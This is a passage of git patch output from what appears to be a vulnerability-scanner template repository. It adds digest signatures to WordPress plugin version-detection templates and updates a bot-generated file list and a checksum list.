490a00463044022004d443ae9bd05b137b976dd1e2b4e105629d1f61070150c067e02888fcf3a82902207b068f2ed743ea61f1eef920eaae5cbfc8b410dc1e87a60bcb5f7362910b6985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..c2c3bdc66b 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c57a9e3fc9eeb4b84b59f8aa2db36ed7f6bbc490eec7821d323508d8af0b7e8902206cdc41b7b88484af4f5fc7a39608584baa2cd94b2cd809bd37e80c1169653ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..900ec51a99 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e72b4b69268c29f91851645b8a63f7df3ecbdd91b44116b6289e6478886371a10220694be601641ca566af8e66ae74fc041ce7c23a1126cbc20a50d0ca72e0231bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..7642798230 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c6e51efb1ebccc0ca2cbf22769cf13d33f4be1222e1f420f2b78cf9c7285473022100958ec90360a75ca2d4939e50e2c6fd39aeeb107520cfee02e7f8fde9b3f7e382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..9c877fe413 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f63b220422281aa417998bf9a706c2278792b8f20297585fc13aaecbaec19bbf02201600ace5c46ad8d3dcd9c6b2fd18d8fe12142e883c7f3472669048d4bfbed9c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..1e64badf4f 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee1d741c0ab2e026b8ad560c9571be675f3d5fbb6b2ed80efdf1993786bf491e022045f0fd77ec1ac709183f8518efb77fea5c996c9fc309920f65ceda08910ac2e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..980a9806b6 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220425dd8c9bf6a6088907575bf14bb5fed4e8ede50360fbbbcab42932c0fa250670220632114a4a7b23a269b4c62091595998258317f3b4c137d06c39afcb711153729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..577ed8bf6a 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206543a5bdebeda8bd84963b80de99ab81be0643f63b3da77a3e630e058b68bb8602202e09507c06179c4c16859f9d76931a5ab4eedd617391e1c7871c6dcba89d05e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..3cdbd3d633 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022064cf9eb2b54fef7367a3bc8e9d50287f4375011e1c3b01a116fc3149a84ae439022100bf8d564e5d00e61573815f3332b23296beef879255ad119f0b59a8a5d72c0326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..e862c03f8d 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f4c84cc3225eac9582d8831a8d4091903cccb2c3e7197898f4b2f0924c34647802204edba487da8ecf0cfe11c924b2594f6e1b8c6cf658d3ceb746acd33789eeeff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..8899c16b56 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d486ef639c1bc71171a8fd1488a43176b9f16b96a519b580d42e14c2fa9aa510221008343381e58125686e1e853504f1580765f63cf0e9a8346f8d2c36300b896d0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..1d36fe89e6 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207777136befe434cd700898db046b6ca6e8d9619ca795a8e1adfc46f33a29fb97022043e6dadc8cf03dd2240f7166e809719bea2a90f926fdd1a6d0d5d077629fb0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..ef94a1e184 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205ec7a2abfe5b4b8a78d1eae031fef4568b1dea26983056ce5d61697f08f7ff0a0220429f019107a255d7d42fc967be2f50c65b810bff794cdf6fc5c1a433910d1c74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..c027df42b1 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da55e284cb8a486faac02b60eecf98f03174f43ee27c86e91d3a3680624f2550022100ba7a950a5e701847108a62194660030c9272bd040a37f8efc6e550b0c0c2b4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..072b2b93f9 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb4842a52460438ed9eb136e8d4f1ff418c7460e14f09c196e31455106a3ac370221009db350bee1d2646cc23b0d8c5c3b323ce1212126d6d4579e1d40086d6eb229ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f4de37f4d7e1c74b3628a8881ce91e4cf714c1eb Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 20 Jul 2024 06:02:27 +0000 Subject: [PATCH 1462/1841] Auto Generated New Template Addition List [Sat Jul 20 06:02:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 63128aa119..b9e9bb2957 100644 --- a/.new-additions +++ b/.new-additions @@ -22,6 +22,7 @@ http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/freshrss-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml +http/exposed-panels/tomcat/tomcat-exposed.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/exposures/files/adcs-certificate.yaml From 677197ac47a64f5452baaab25e2e9d018f7abb68 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Jul 2024 06:02:34 +0000 Subject: [PATCH 1463/1841] Auto Generated Templates Checksum [Sat Jul 20 06:02:34 UTC 2024] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6a382db9d8..1a21ea3070 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4033,7 +4033,7 @@ http/exposed-panels/extreme-netconfig-ui.yaml:c99540335fbd14e8a832200372e67e9f8a http/exposed-panels/extron-cms-panel.yaml:adbdc23be4107dc614acb0ef6ea20aba3796bec2 http/exposed-panels/ez-publish-panel.yaml:5dc8fa80dca1479e568d4b1cf87563755471e0a0 http/exposed-panels/f-secure-policy-manager.yaml:e759ce79b7869284f9cddab81bfa0da26d08099b -http/exposed-panels/f5-admin-interface.yaml:d181319b870b753518de3b50f7ea3ee5e9bde103 +http/exposed-panels/f5-admin-interface.yaml:8ee31f805dc3cf9b892376f580347ea93efa8715 http/exposed-panels/falcosidekick-panel.yaml:cefd542269e92b8ee42dffece2d74a668f63ead8 http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee @@ -4691,7 +4691,7 @@ http/exposed-panels/tikiwiki-cms.yaml:d91b81e5563c5ba7d2250b12f8f212123f011e90 http/exposed-panels/tiny-file-manager.yaml:a2b82b2bbaced8296bdf096ca1d4572118f78eb5 http/exposed-panels/tiny-rss-panel.yaml:8f1a227e6817acfd26dfc58649ba4ba519afc061 http/exposed-panels/tixeo-panel.yaml:3d3add11d1b9ff423817bf2edaf47a692049b3e1 -http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:142cae6b2c3657adfc91f00225383494722e768f +http/exposed-panels/tomcat/tomcat-exposed.yaml:cd058476df524c6c30933ec604eb22c339457b8c http/exposed-panels/tooljet-panel.yaml:25787d33b29529884c9002fafede329a5f53111e http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4fb417b3d49a http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b @@ -7305,229 +7305,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:d136222c7099ff301606b82ffc7de42d04ee6a87 +http/technologies/wordpress/plugins/add-to-any.yaml:a97973b1c5ed79ee2fcd47a4bd551c141f349fe0 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:1e047592047f4c95f4411eeeabdc70eaae90ceba http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:c21fed774394def20cb662dcffc9b175f7825fd8 +http/technologies/wordpress/plugins/akismet.yaml:74a2856e85e5537356efccd356385c859e878ed9 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:bc240b504f0a4aceb2849571af7492617bdf834e +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:a9b69ca4ae978bfd43c6c821b32e3f843e0f8776 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9951346f8422f87f8b8a3b80a94acc9d2c81dd8b +http/technologies/wordpress/plugins/amp.yaml:fd939994d2d87e2ce8eef788f173f6131fa249ee +http/technologies/wordpress/plugins/antispam-bee.yaml:eb7a1e66a357e2c4ab775ff8a04eb219c4166a59 +http/technologies/wordpress/plugins/astra-sites.yaml:9382940786fcffd8b32facf33ce8c657fa8d2aab http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:8b918520f744ba9038601c02231960b972c71efd +http/technologies/wordpress/plugins/backwpup.yaml:04588be1fee38fb9bfafd38f7d1e92ddb7fbb2e4 +http/technologies/wordpress/plugins/better-search-replace.yaml:5fda8914eac1f6815eadce73ca14a0926bf82e65 +http/technologies/wordpress/plugins/better-wp-security.yaml:c99e7aa5417ab0f6efcb25b2a890637443f1019a +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:318923e32ed8087dbbeddd3eb17a0f79d8150a3c +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1896cecb20ab67eda53577320fe65d2f0152c0e3 +http/technologies/wordpress/plugins/breeze.yaml:2139a93b1a869f50bfa94b8b9288c4f91d9ffaee +http/technologies/wordpress/plugins/broken-link-checker.yaml:d39bdda5ce4e3de4eb6655c66884fb00bde59957 +http/technologies/wordpress/plugins/chaty.yaml:5641745d9d69704ff6b23a5c04ab125c2828a093 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:db4edf74fa04c632509042848f0e2c6c7c83727f +http/technologies/wordpress/plugins/classic-editor.yaml:c97fcf64adcfe4150f2147d352283ac95fe62372 +http/technologies/wordpress/plugins/classic-widgets.yaml:4a46d05269668dcd69b5e63de31d80c7ea9407c9 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9c859d60be12b640ebae97a8fd5f510e5db255b7 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:fcf545666e70a797acd9f9917c677739e17f93e3 +http/technologies/wordpress/plugins/coblocks.yaml:250de7b5952af0015df6b7f92e3c9040e926d713 +http/technologies/wordpress/plugins/code-snippets.yaml:6756ccb8fb88363e32ce872170b0bb7a45538b8c +http/technologies/wordpress/plugins/coming-soon.yaml:b8abc9c2e81a6226343541105d1e1229294d6273 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:8d3b3fedf2dfa5114c811333ea6ff06b2154f324 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:75804880ff95d84dc45f3ba68b83bae0983b6fac +http/technologies/wordpress/plugins/contact-form-7.yaml:ca1b3ee27b69de64d8d0401ca36c4ec4109b506f +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:b1bcd3c24febf4e5f8dc02cbd0b33c699694a623 +http/technologies/wordpress/plugins/cookie-law-info.yaml:739ea86438b4978ca385e876702e415cd0cb8616 +http/technologies/wordpress/plugins/cookie-notice.yaml:98a8d7d1191f039c3c3ab2f63cb1cdba21a9917c +http/technologies/wordpress/plugins/copy-delete-posts.yaml:6a686fd9f493edbcffb8b70a17f28834ee370629 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:c56aa06d9c23f93f7b96deb8bcb72e40c968f0dd +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:fa9cc7967075d7030479ee702a9966c5a5298879 +http/technologies/wordpress/plugins/custom-css-js.yaml:d6b8795c280d0463bf77bb567b57ff7bd2082a1b +http/technologies/wordpress/plugins/custom-fonts.yaml:4ea2b09a579124b24d372da9de3a13bbf7d1f0a0 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:4b20f86726ea435d9883a4bd47d833cc5ecbdecb +http/technologies/wordpress/plugins/disable-comments.yaml:dd97025ac4d4e1acd147626fb49883644a51186b +http/technologies/wordpress/plugins/disable-gutenberg.yaml:aebfb96825c1cc43513d2fe8da0aa82c2ae03b75 +http/technologies/wordpress/plugins/duplicate-page.yaml:b02348aa08ad2dcaeee5c80e7d0019c7b3beebe9 +http/technologies/wordpress/plugins/duplicate-post.yaml:9eb479ae5b793cb54f07027101b2a7704baf33c3 +http/technologies/wordpress/plugins/duplicator.yaml:372a61b91bc1610dcdb82f0b2fff737353b65d86 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:51ea4e6cf32be1bd196b105d3eca513c1b6dbe1e http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:fe2dde3e1e31c53c8223254961648d5ed931522d +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:075bd8102ca5188820b94afbaf2b8a1201fdbf29 +http/technologies/wordpress/plugins/elementor.yaml:6e7e05db5399c60ac14c4c0fb78a0ca56b478cc3 +http/technologies/wordpress/plugins/elementskit-lite.yaml:be1886ff7470e6f1cbb2d12238d885fabb87c897 +http/technologies/wordpress/plugins/enable-media-replace.yaml:2bead0dbfdff25fbd1a24f5014fdf7057951d145 +http/technologies/wordpress/plugins/envato-elements.yaml:38364bf0be511b8c4c945d69a01373c23ad0e219 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e15e34b404c733018a953111ff81217623de65cf +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:458474ffeb716aa0e1241f742c488e04f703c7b9 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:ad6a8a47fda824bba10ed3c3632aa15d25edbdd8 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:a2806dd482fc72973c495c2bd8f56348f4996a49 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:d48c8b02a8161eb8d52f4731571981c53b18e52c +http/technologies/wordpress/plugins/flamingo.yaml:8ed7521665fa94c39622e1ce824f7b3bb43bc20f +http/technologies/wordpress/plugins/fluentform.yaml:1bb4628b30880129553c173234110f71a5957dbe +http/technologies/wordpress/plugins/font-awesome.yaml:9aa4a2d9da4da66f212b2a71fff3075efc1cbf16 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:0eff62db08ff03925c8d58eb3db66077f15e15d7 +http/technologies/wordpress/plugins/formidable.yaml:4435d6b45b966e35fd99cd0cc0ac12ec32b80237 +http/technologies/wordpress/plugins/forminator.yaml:31f9393ff382205842592f302afce9db00cb8d6d +http/technologies/wordpress/plugins/ga-google-analytics.yaml:240998275836f73bd28c27c8b0673145d9a7edf9 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:2ff05171abb920faedc74ce69eb14b32be6dc52a +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:da15d27c39d32c34b8f748b594be147742746d02 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:ae7c709aa2965dcdbbb2d18a9aa23a502462e395 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:a1a173d93c142561b5159cbd8702e0cf71d6dba8 +http/technologies/wordpress/plugins/google-site-kit.yaml:46fd9d0c9c53c369ba6b76526ba3eb8701f0dc90 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:17494bd5d3051f9bebc7009f0b824fcb929a191a +http/technologies/wordpress/plugins/gtranslate.yaml:38297c99d4ea85d147fb80949f550d47f9acf1b5 +http/technologies/wordpress/plugins/gutenberg.yaml:f5c515466dd36c94b6709a4403a45b236fee1086 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:f47377e266de5ca569da91bcd7e9b0489e8ed1c3 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 